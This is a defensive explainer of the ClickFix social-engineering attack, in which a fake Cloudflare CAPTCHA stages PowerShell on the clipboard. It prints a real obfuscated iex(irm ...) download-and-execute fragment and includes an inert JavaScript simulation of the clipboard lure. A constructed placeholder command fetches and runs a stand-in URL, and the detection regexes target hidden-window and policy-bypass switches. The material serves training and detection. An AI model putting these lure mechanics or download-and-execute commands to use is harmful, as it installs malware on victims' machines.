Active Threat Alert

ClickFix Attack Explained

A social engineering attack that tricks users into running a malicious PowerShell command on their own machine, by impersonating Cloudflare's human-verification (CAPTCHA) page.

[Screenshot: femcaremedspa.com, fake Cloudflare page]

Attack Stage 1: The Initial Lure

The victim visits a compromised or malicious website. They're presented with what appears to be a legitimate Cloudflare CAPTCHA verification page. Everything looks authentic—the Cloudflare branding, the "Verify you are human" checkbox, and the security messaging.

🎭 Social Engineering Tactic
Cloudflare protects millions of websites, so users are conditioned to trust these verification pages. Attackers exploit this familiarity to lower the victim's guard.
1. Legitimate appearance: real Cloudflare logo, authentic styling, convincing Ray ID
2. Trust exploitation: users encounter real Cloudflare checks daily, creating automatic compliance
[Screenshot: femcaremedspa.com, fake verification steps popup]

Attack Stage 2: Malicious Instructions

After clicking the checkbox, a popup appears with "Verification Steps." This is where the attack diverges from legitimate Cloudflare behavior. The victim is instructed to press specific key combinations.

🚨 Critical Red Flag
Real Cloudflare NEVER asks you to:

• Press Windows + R (opens Run dialog)
• Press Ctrl + V (paste from clipboard)
• Press Enter to execute anything

These are commands designed to execute code, not verify you're human.
📋 What's Actually Happening
// When the fake checkbox is clicked:
1. A script on the page copies a PowerShell command to the clipboard (browsers only let a page write the clipboard during a user gesture, which is the real reason the lure needs a click)
2. Win+R opens the Windows Run dialog
3. Ctrl+V pastes the malicious command
4. Enter executes the payload
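As an added example (not code from the page or from the lure it shows), this is the page-side mechanism behind stage 2: the fake checkbox's click handler writes an attacker-chosen string to the clipboard and only then reveals the "Verification Steps". The staged string, the element id cf-checkbox, and the stand-in checkbox and clipboard objects are assumptions made for this demo; the staged command is inert, so the block can be run safely.

```javascript
"use strict";

// Placeholder for what the lure stages on the clipboard. Real ClickFix pages
// stage an obfuscated PowerShell one-liner ending in iex(irm <url>); this
// string is inert so the demo is safe to run. (Constructed for this example.)
const STAGED_COMMAND =
  'powershell -c "Write-Host ClickFix demo: nothing was downloaded"';

// The "Verification Steps" the popup shows after the click. These are the
// tell: no genuine CAPTCHA asks for keyboard shortcuts.
const VERIFICATION_STEPS = [
  "1. Press Windows Key + R",
  "2. Press Ctrl + V",
  "3. Press Enter",
];

// Wire the fake checkbox. `clipboard` and `showSteps` are injected so the
// logic can run outside a browser; in a real page they are navigator.clipboard
// and whatever renders the popup.
function installClickFixHandler(checkbox, clipboard, showSteps) {
  const state = { copied: null, stepsShown: false };
  checkbox.addEventListener("click", () => {
    // Browsers only allow a page to write the clipboard during a user gesture.
    // That is why the lure needs the victim to click something first: the
    // checkbox exists to satisfy this requirement, not to verify anything.
    clipboard.writeText(STAGED_COMMAND).catch(() => {});
    state.copied = STAGED_COMMAND;
    showSteps(VERIFICATION_STEPS); // the popup appears only after the copy
    state.stepsShown = true;
  });
  return state;
}

// Minimal stand-ins for the DOM element and the Clipboard API so the block
// runs under Node and the behaviour can be checked without a browser.
function makeFakeCheckbox() {
  const handlers = [];
  return {
    addEventListener(type, fn) { if (type === "click") handlers.push(fn); },
    click() { handlers.forEach((fn) => fn()); },
  };
}
function makeFakeClipboard() {
  const clip = { text: "" };
  clip.writeText = (t) => { clip.text = t; return Promise.resolve(); };
  return clip;
}

// Simulate the victim's click and report what ended up on the clipboard.
function demo() {
  const checkbox = makeFakeCheckbox();
  const clipboard = makeFakeClipboard();
  const shown = [];
  const state = installClickFixHandler(checkbox, clipboard, (steps) => shown.push(...steps));
  checkbox.click();
  return { clipboard: clipboard.text, shown, state };
}

if (typeof document !== "undefined") {
  // In a browser: attach to a checkbox with id "cf-checkbox" (assumed markup).
  installClickFixHandler(
    document.getElementById("cf-checkbox"),
    navigator.clipboard,
    (steps) => alert(steps.join("\n")),
  );
} else {
  console.log(demo());
}
```

The order of operations is the point: the copy happens on the click, before any instruction is displayed, so by the time the victim reads "Press Windows Key + R" the command is already waiting to be pasted. Pasting into Notepad first, as the defense section suggests, exposes exactly that staged string.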
[Screenshot: femcaremedspa.com with the Windows Run dialog open, showing the malicious command]

Attack Stage 3: Payload Execution

The Windows Run dialog now contains the malicious PowerShell command that was silently copied to the clipboard. If the user presses Enter, the malware payload executes with their user privileges.

💀 Malicious Payload Detected
The command shown contains obfuscated PowerShell that will:

• Download malware from a remote server
• Execute it directly in memory (fileless)
• Potentially install info-stealers, ransomware, or RATs
⚠️ Obfuscated Command Analysis
// Visible in Run dialog (the field scrolls to the end of the pasted text, so only the tail of the command is shown):
[ToInt16($ha80.Substring($i,2),16)];iex(irm $d3d6)

// Decoded behavior:
$ha80 = a hex string; ToInt16(..., 16) on two characters at a time turns each pair back into one character, so the URL never appears in cleartext
$d3d6 = the decoded result: the attacker's malware URL
irm = Invoke-RestMethod (download)
iex = Invoke-Expression (execute the downloaded text in memory)
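An added triage helper, not from the page: given the full command a user pasted (here a constructed sample built around the page's $ha80 and $d3d6 names and a placeholder URL), it decodes the hex blob the same way the PowerShell loop does and reports the hidden URL without executing or fetching anything. The complete [char][Convert]::ToInt16 form of the loop, the placeholder URL, and the function names are assumptions for this example.

```javascript
"use strict";

// Mirror of the PowerShell decode loop the page shows a fragment of (full form assumed):
//   for($i=0;$i -lt $ha80.Length;$i+=2){ $d3d6 += [char][Convert]::ToInt16($ha80.Substring($i,2),16) }
// Each two-character hex pair becomes one character of the hidden string.
function decodeHexPairs(hex) {
  if (!/^(?:[0-9a-fA-F]{2})*$/.test(hex)) throw new Error("not a string of hex pairs");
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Constructed sample in the shape the page describes. The variable names $ha80
// and $d3d6 come from the page; the encoded URL is a placeholder, not a real
// malware host.
const PLACEHOLDER_URL = "http://example.invalid/stage2.ps1";
const HEX_BLOB = Buffer.from(PLACEHOLDER_URL, "utf8").toString("hex");
const SAMPLE_COMMAND =
  `$ha80='${HEX_BLOB}';$d3d6='';` +
  "for($i=0;$i -lt $ha80.Length;$i+=2){$d3d6+=[char][Convert]::ToInt16($ha80.Substring($i,2),16)};" +
  "iex(irm $d3d6)";

// Static triage of a pasted command: decode every quoted hex blob, recover any
// URL hidden inside it, and flag the download-and-execute pattern. Nothing is
// executed and nothing is fetched.
function triageClickFixCommand(cmd) {
  const findings = {
    visibleUrls: cmd.match(/https?:\/\/[^\s'"]+/g) || [], // what a reader sees in the Run dialog
    hexVariables: {},                                      // decoded value of each $var='hex...'
    hiddenUrls: [],
    downloadAndExecute: false,
  };
  for (const m of cmd.matchAll(/\$(\w+)\s*=\s*'((?:[0-9a-fA-F]{2}){4,})'/g)) {
    findings.hexVariables[m[1]] = decodeHexPairs(m[2]);
  }
  for (const value of Object.values(findings.hexVariables)) {
    const url = value.match(/https?:\/\/[^\s'"]+/);
    if (url) findings.hiddenUrls.push(url[0]);
  }
  // iex(irm ...) / Invoke-Expression(Invoke-RestMethod ...) in either spelling.
  findings.downloadAndExecute =
    /\b(iex|Invoke-Expression)\s*\(\s*(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b/i.test(cmd);
  return findings;
}

console.log(triageClickFixCommand(SAMPLE_COMMAND));
```

Run against the sample, visibleUrls is empty while hiddenUrls holds the decoded address: that gap is the whole purpose of the hex encoding, and it is why a glance at the Run dialog tells the victim nothing. The decoded URL is what goes into the block request and the incident ticket.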
Complete Attack Chain
How ClickFix compromises systems in under 10 seconds

🌐 Visit Site (compromised website) → ☑️ Click Checkbox (copies payload to clipboard) → ⌨️ Follow Steps (Win+R, Ctrl+V, Enter) → 💀 Compromised (malware executes)
🎯 Why It Works
Exploits user trust in Cloudflare's ubiquitous security checks. Most users have clicked hundreds of real CAPTCHAs and don't question the process.

🔓 Bypasses Security
The browser never downloads anything; the victim carries the command across to a trusted system dialog by hand. No attachment passes through an email filter, no download warning fires, and many endpoint protections treat the resulting PowerShell launch as ordinary user-initiated activity.

👻 Fileless Execution
PowerShell downloads the first stage and runs it directly in memory, so nothing is written to disk at that point and signature-based antivirus has nothing to scan. Later stages may still drop files, which is one reason the logging and application-control measures below matter.

🎭 Common Payloads
Info-stealers (Lumma, RedLine), Remote Access Trojans (AsyncRAT), cryptocurrency miners, and ransomware droppers.
🛡️ DEFENSE STRATEGIES

Protecting Your Organization

Train employees to recognize and report these attacks before damage occurs.

Cloudflare Never Asks for Keyboard Commands

Real CAPTCHA verification completes inside the browser with at most a click. Any instruction to leave the browser, or to press Win+R, Ctrl+V, or Enter, is an attack.

Check Your Clipboard

If a website asks you to paste something, open Notepad first and paste there to see what's actually on your clipboard.

Restrict PowerShell Execution

Use AppLocker or Windows Defender Application Control to limit PowerShell to signed scripts only. Note that a one-liner pasted into the Run dialog is not a script file, so a script rule alone does not stop it; the benefit is that when AppLocker or WDAC is enforcing, PowerShell runs in Constrained Language Mode, which blocks much of what these in-memory payloads rely on. Where standard users have no business running PowerShell at all, an executable rule that denies powershell.exe for them closes the hole directly.

Enable PowerShell Logging

Configure Script Block Logging (Event ID 4104) and Module Logging so that suspicious commands are recorded and can be investigated. Script Block Logging captures the one-liner as typed, and because Invoke-Expression compiles the downloaded text as a new script block, the decoded second stage is usually logged as well, which is exactly what an investigator needs to see.
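An added detection example, not from the page: it scores constructed Script Block Logging (Event ID 4104) records for the traits described above and then pulls in sibling script blocks from the same process, which is where the second stage appears after Invoke-Expression compiles it. The record shape, the sample script text, the indicator weights, and the threshold are assumptions for this example; the hex-encoded URL is a placeholder.

```javascript
"use strict";

// Constructed sample of Script Block Logging events (Event ID 4104) in the
// shape a SIEM export might have. The script text is placeholder data written
// for this example, not a real capture: two ordinary commands, a ClickFix-style
// one-liner, and the block PowerShell logs when Invoke-Expression compiles the
// downloaded text (here a placeholder).
const HEX_URL = Buffer.from("http://example.invalid/stage.ps1").toString("hex");
const EVENTS = [
  { id: 1, eventId: 4104, pid: 4120,
    scriptBlockText: "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object" },
  { id: 2, eventId: 4104, pid: 4120,
    scriptBlockText: "$r = Invoke-RestMethod https://api.example.invalid/status; $r.version" },
  { id: 3, eventId: 4104, pid: 7788,
    scriptBlockText: `$ha80='${HEX_URL}';$d3d6='';for($i=0;$i -lt $ha80.Length;$i+=2)` +
      "{$d3d6+=[char][Convert]::ToInt16($ha80.Substring($i,2),16)};iex(irm $d3d6)" },
  { id: 4, eventId: 4104, pid: 7788,
    scriptBlockText: "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -ep bypass -c <stage-2 placeholder>'" },
];

// Weighted indicators for the traits the page describes: download-and-execute
// in one expression, hex-pair decoding of a hidden value, a long hex literal,
// plus the window-hiding and policy-bypass switches such payloads carry.
const INDICATORS = [
  { name: "iex-of-download", weight: 3,
    re: /\b(iex|Invoke-Expression)\s*\(\s*(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b/i },
  { name: "hex-pair-decode-loop", weight: 2,
    re: /\[Convert\]::ToInt16\([^)]*Substring\(\$\w+,\s*2\)\s*,\s*16\)/i },
  { name: "long-hex-literal", weight: 1, re: /'[0-9a-f]{32,}'/i },
  { name: "hidden-window", weight: 1, re: /-w(indowstyle)?\s+hidden/i },
  { name: "policy-bypass", weight: 1, re: /-(ep|executionpolicy)\s+bypass/i },
  { name: "no-profile", weight: 1, re: /-nop(rofile)?\b/i },
];

// Score one script block: which indicators fired and their summed weight.
function scoreScriptBlock(text) {
  const fired = INDICATORS.filter((ind) => ind.re.test(text));
  return {
    score: fired.reduce((sum, ind) => sum + ind.weight, 0),
    hits: fired.map((ind) => ind.name),
  };
}

// Flag 4104 events at or above the threshold, then collect every other event
// from the same process: Invoke-Expression compiles the downloaded text as a
// new script block, so the second stage usually surfaces as a sibling event
// that should be reviewed together with the one-liner.
function findClickFixActivity(events, threshold = 4) {
  const flagged = events
    .filter((e) => e.eventId === 4104)
    .map((e) => ({ ...e, ...scoreScriptBlock(e.scriptBlockText) }))
    .filter((e) => e.score >= threshold);
  const pids = new Set(flagged.map((e) => e.pid));
  const flaggedIds = new Set(flagged.map((e) => e.id));
  const related = events.filter((e) => pids.has(e.pid) && !flaggedIds.has(e.id));
  return { flagged, related };
}

console.log(JSON.stringify(findClickFixActivity(EVENTS), null, 2));
```

The legitimate Invoke-RestMethod call in event 2 scores zero because the high-weight indicator requires the download to be fed straight into Invoke-Expression; that pairing, not the download itself, is what separates the lure from an admin pulling a JSON status page. The second stage (event 4) does not reach the threshold on its own, but it is surfaced through the process correlation, which is the behaviour an analyst wants when the one-liner and its child are logged seconds apart.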

Report Suspicious Pages

Train users to report unusual verification requests to IT security immediately. Early detection prevents spread.

Remember: When in doubt, don't click out.

Close the browser tab and navigate to the site directly if you need to access it.